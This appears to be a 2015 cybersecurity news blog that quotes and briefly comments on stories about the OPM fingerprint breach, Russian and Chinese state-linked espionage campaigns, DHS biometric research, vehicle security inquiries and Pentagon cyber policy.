DHS Is Funding a Boeing Project for Enhanced Biometrics to Be Used as a Means for Device Self-Destruction

DHS is funding a Boeing project for enhanced biometrics to be used as a means for device self-destruction after identifying it is no longer being used by its owner:

The technology powering the devices potentially could identify the user’s walking style, for example. Officials would be alerted if the gait does not match the authorized user’s walk – a red flag the phone might have fallen into the wrong hands, officials said.

The “secret sauce” of the mobile device is a so-called neuromorphic computer chip that simulates human learning, Vincent Sritapan, the program manager for DHS’ mobile device security program, told Nextgov.

Gait recognition — driven by the phone’s accelerometer, GPS and the chip — is but one of many kinds of continuous ID verification intended to tighten access controls on mobile devices.

Boeing and HRL Laboratories, a software firm jointly owned by Boeing and General Motors, are partnering under a DHS project worth $2.2 million over 2.5 years.

The companies “pretty much are leveraging user behavior information” from data gathered by sensors found on any standard consumer smartphone, Sritapan said. Those feelers could include microphones, cameras and touchpads, he added. The artificial intelligence could help agencies determine, “Are you who you say you are, and do we give you access to enterprise resources like email?” he said.

This sounds quite intriguing.

OPM Breach Exposed Fingerprints of 5.6 Million US Government Employees

Another week, another round of bad news about the OPM breach. This time we learn the fingerprints of 5.6 million US government employees was exfiltrated by the ostensible Chinese hackers:

The attack on the agency, which is the main custodian of the government’s most important personnel records, has been attributed to China by American intelligence agencies, but it is unclear exactly what group or organization engineered it. Before Wednesday, the agency had said that it lost only 1.1 million sets of fingerprints among the records of roughly 22 million individuals that were compromised.

“Federal experts believe that, as of now, the ability to misuse fingerprint data is limited,” the agency said in a written statement. But clearly the uses are growing as biometrics are used more frequently to assure identity, in secure government facilities and even on personal iPhones.

The working assumption of investigators is that China is building a huge database of information about American officials or contractors who may end up entering China or doing business with it. Fingerprints could become a significant part of that effort: While a Social Security number or a password can be changed, fingerprints cannot.

Customs and immigration officials frequently fingerprint incoming travelers; millions of fingerprints in a Chinese database would help track the true identities of Americans entering the country.

“I am assuming there will be people we simply can’t send to China,” a senior intelligence official said this summer, before the most recent revelation. “That’s only part of the damage.”

The agency said that an “interagency working group,” with help from the F.B.I., the Department of Homeland Security and the intelligence agencies, “will review the potential ways adversaries could misuse fingerprint data now and in the future.”

The OPM breach is going to be studied for the next few years and will become the premier case study on how not to conduct cyber security. It is amazing they still have not increased their cyber defense capabilities since this all came to light a few short months ago.

Huge Surge in Targeted Cyber Attacks in Japan in 2015

According to a report by the Japanese National Police Agency, there was a huge surge in targeted cyber attacks in Japan in 2015:

The National Police Agency said it recorded 1,472 attacks from January to June, NHK news agency reported.

The agency monitors such attacks in coordination with more than 6,900 defence and nuclear-related firms and others, which are the main targets.

In targeted attacks, emails carrying computer viruses are sent to companies and government offices in a bid to steal classified information. Typically, the virus is hidden in an attached file sent with the e-mail.

The agency said cases in which a Microsoft Word document was used to automatically download an illicit programme accounted for 64 percent of all incidents involving attached files. That’s up from two percent last year.

Two US Senators Are Asking Automobile Manufacturers for Details on Their Cyber Security Strategies

Ever since the proof-of-concept hack against Jeep, automobile cyber security is on peoples minds. This time two US senators are asking automobile manufacturers for details on their cyber security strategies:

Two U.S. senators have asked the world’s biggest automakers for information on steps they have taken to protect cars from being hacked, as attention on vehicle security has surged following the first car recall over a cyber bug.

Democratic Senators Edward Markey and Richard Blumenthal wrote to 18 automakers on Wednesday asking about efforts taken to secure vehicles including 2015 and 2106 models. They asked automakers how they test electronic components and communications systems to ensure attackers cannot gain access to onboard networks.

Concerns about auto cyber security have grown since July, when researchers gained remote control of a moving Jeep, prompting Fiat Chrysler Automobiles (FCAU.N) (FCHA.MI) to recall some 1.4 million vehicles for a software update.

The request from the senators follows a review that Markey began in December 2013. He concluded in a February 2015 report that the spread of technology connecting vehicles to networks had outpaced industry and government efforts to protect vehicles from hackers.

The senators said they want to know what automakers have done since the last survey to beef up security.

Lawmakers Accuse DHS of Stonewalling on Cyber Security Plans

In the this-is-not-a-surprise department, lawmakers accuse DHS of stonewalling on cyber security plans:

“The department has persisted in its ‘go it alone’ mentality and has ignored Congress’ requests for information despite a record that demonstrates its need for oversight and accountability,” added Rep. John Ratcliffe (R-Texas), who chairs the panel’s subcommittee on cybersecurity, infrastructure protection and security technologies.

The DHS has played an increasingly important role in the government’s cybersecurity effort over the last year.

Congress late last year passed a series of bills that strengthened the agency’s cyber workforce and codified certain aspects of the DHS cybersecurity mission.

Lawmakers are currently considering more bills that would further clarify the agency’s cyber role while strengthening its authority to proactively investigate and defend federal networks across the government.

The House Homeland Security Committee is also drafting a bill that would transform the NPPD.

McCaul said the committee would soon hold hearings as lawmakers work to draft the legislation.

“We welcome the department’s input and look forward to working closely with them on streamlining NPPD’s structure,” he said.

The committee’s bill would rename the NPPD to Cybersecurity and Infrastructure Protection. It would also create two positions to oversee the new wing: a deputy undersecretary for cybersecurity and a deputy undersecretary for infrastructure protection.

China May Have Conducted a Cyber Attack Against the Russian Military

Even though Russia has highly advanced cyber attack capabilities, this does not mean they are immune to operations designed to breach their networks. It would seem China may have conducted a cyber attack against the Russian military:

“There is a world market for classified data of any time,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”

The attack starts with a well-written Russian-language email that seems to come from someone else in the targeted military division or an analyst section from the same group of the military, he said.

It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.

“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”

That’s when the malware takes over the computer and everything the user has access to, the attackers now have access to.

“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”

This is a fairly standard, yet highly advanced, technique for confusing endpoint anti-virus. This is why layered defenses extend beyond the network and need to be implemented at the endpoint level too. Tools like application whitelisting, host intrusion prevention, and desktop firewalls, when used together, can severely minimize the possibility of these types of malware from successfully executing.

Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?

Seven Years of Malware Linked to Russian State-Backed Cyber-Espionage Group

An apparently state-backed cyber-espionage group based in Russia has conducted a targeted malware campaign targeting foreign governments over the course of the past seven years:

For the past seven years, a cyber-espionage group operating out of Russia—and apparently at the behest of the Russian government—has conducted a series of malware campaigns targeting governments, political think tanks, and other organizations. In a report issued today, researchers at F-Secure provided an in-depth look at an organization labelled by them as “the Dukes,” which has been active since at least 2008 and has evolved into a methodical developer of “zero-day” attacks, pulling together their own research with the published work of other security firms to provide a more detailed picture of the people behind a long-running family of malware.

Characterized by F-Secure researchers as a “well resourced, highly dedicated and organized cyberespionage group,” the Dukes have mixed wide-spanning, blatant “smash and grab” attacks on networks with more subtle, long-term intrusions that harvested massive amounts of data from their targets, which range from foreign governments to criminal organizations operating in the Russian Federation. “The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks and governmental subcontractors,” the F-Secure team wrote. “Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen terrorism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.”

The first known targets of the Dukes’ earliest-detected malware, known as PinchDuke, were some of the first known targets and were associated with the Chechen separatist movement. By 2009 the Dukes were going after Western governments and organizations in search of information about the diplomatic activities of the United States and the North Atlantic Treaty Organization. While most of the attacks have used spear phishing e-mails as the means of injecting malware onto targeted systems, one of their attacks has spread malware through a malicious Tor exit node in Russia, targeting users of the anonymizing network with malware injections into their downloads.

China-Based Cyber Attacks on US Military Are ‘Advanced, Persistent and Ongoing’

Another day, another news item about state-backed Chinese-based cyber attacks. This time Trend Micro has released a comprehensive report detailing how China-based cyber attacks on US military targets are “Advanced, Persistent And Ongoing”:

In its blog announcing the paper, Trend Micro stated that “Operation Iron Tiger is a targeted attack campaign discovered to have stolen trillions of bytes of data from defense contractors in the U.S., including stolen emails, intellectual property, and strategic planning documents.” The report further details that targets of Iron Tiger included military defense contractors, intelligence agencies, FBI-based partners, and the U.S. government. The private entities were tech-based government contractors in the electric, aerospace, intelligence, telecommunications, energy, and nuclear engineering industries.

Iron Tiger was observed exfiltrating up to 58GB worth of data from a single target, more than was stolen in the Sony attack. It could have potentially stolen up to terabytes of data in total, Trend Micro reports. It is highly environmentally adaptive and otherwise sophisticated and well organized, potentially merely an arm of a larger, multi-teamed operation with various targets.

China is convincingly Iron Tiger’s home base

The primary situs of China as the operatives’ home base was convincingly evidenced by the facts that the operatives used virtual private network (VPN) servers that only accepted China-based registrants, used Chinese file names and passwords, and operated from China-registered domains, according to the report. Some of Iron Tiger’s actions were also attributed Iron to an individual physically located in China.

DoD CIO Says There Is a Need to Make It Cost Prohibitive for Hackers to Conduct Cyber Attacks

DoD CIO Terry Halvorson is talking tough on cyber, stating there is a need to make it cost prohibitive for hackers to conduct cyber attacks:

“We are on the wrong side of the cyber economic curve,” he said at the summit. “We need to raise barriers to attackers’ entry, making it more expensive to play.”

But how? The answer is multifold, but at least one aspect is automation, mechanizing some of the basic actions and response involved in cybersecurity maintenance, Halvorsen said.

Automation is key to turning around the economics and coping with the speed of the threat, he said at the summit and on the call.

“Automating eliminates the basic [adversarial] players, makes it so you have to raise your game to play,” Halvorsen said. “It reduces the benefit hackers will see and makes it more expensive for hackers to play.”

Another key part is establishing a pervasive, standard-operating-procedure culture of cybersecurity throughout entire enterprises and communities. It’s a worry that Halvorsen said keeps him up at night.

“How do I get a cyber discipline culture, how do I get a cyber economic culture and how do I get a cyber enterprise culture? I think those are the three things that if we got those, almost everything else comes after,” he said. “If I get to the cyber enterprise culture, I’ll start doing integrated, layered defenses, I’ll use automated tools — [joint regional security stacks are] the cornerstone for that — I’ll get the right level of accountability and I will understand the money.”

The only way DoD will get to where it needs to be in cyber security is through a cultural shift. Once senior DoD leaders recognize they are the biggest threat to the enterprise network, and thus stop asking for unnecessarily risky exceptions to DoD policy simply because they are who they are, then DoD may finally realize the type of discipline needed for the future.

US Cyber Command Designing System to Stay Ahead of Hackers but Will Require Manual Data Entry

United States Cyber Command is designing a system to stay ahead of hackers but apparently they are currently incapable of acquiring technology to automate this functionality:

U.S. Cyber Command is building a massive, electronic system to provide an overview of the vulnerabilities of the military’s computer networks, weapons system and installations and help officials prioritize how to fix them, its deputy commander said on Thursday.

Lieutenant General Kevin McLaughlin told Reuters officials should reach agreement on the framework within months, turning the system into an automated “scorecard” in coming years.

McLaughlin said the effort grew out of a disturbing report released earlier this year by the Pentagon’s chief weapons tester, Michael Gilmore. The report warned that nearly every major U.S. weapons system was vulnerable to cyber attacks, and an escalating number of attacks on U.S. computer networks by Russia and China.

Cyber Command staff would do the initial data entry by hand, but the goal was to create a fully automated system that would help defense officials instantaneously detect and respond to any attacks, McLaughlin said after a speech at the annual Billington Cybersecurity Summit.

Here we are in 2015 and US Cyber Command is developing a program designed to perform initial data entry manually. Seriously?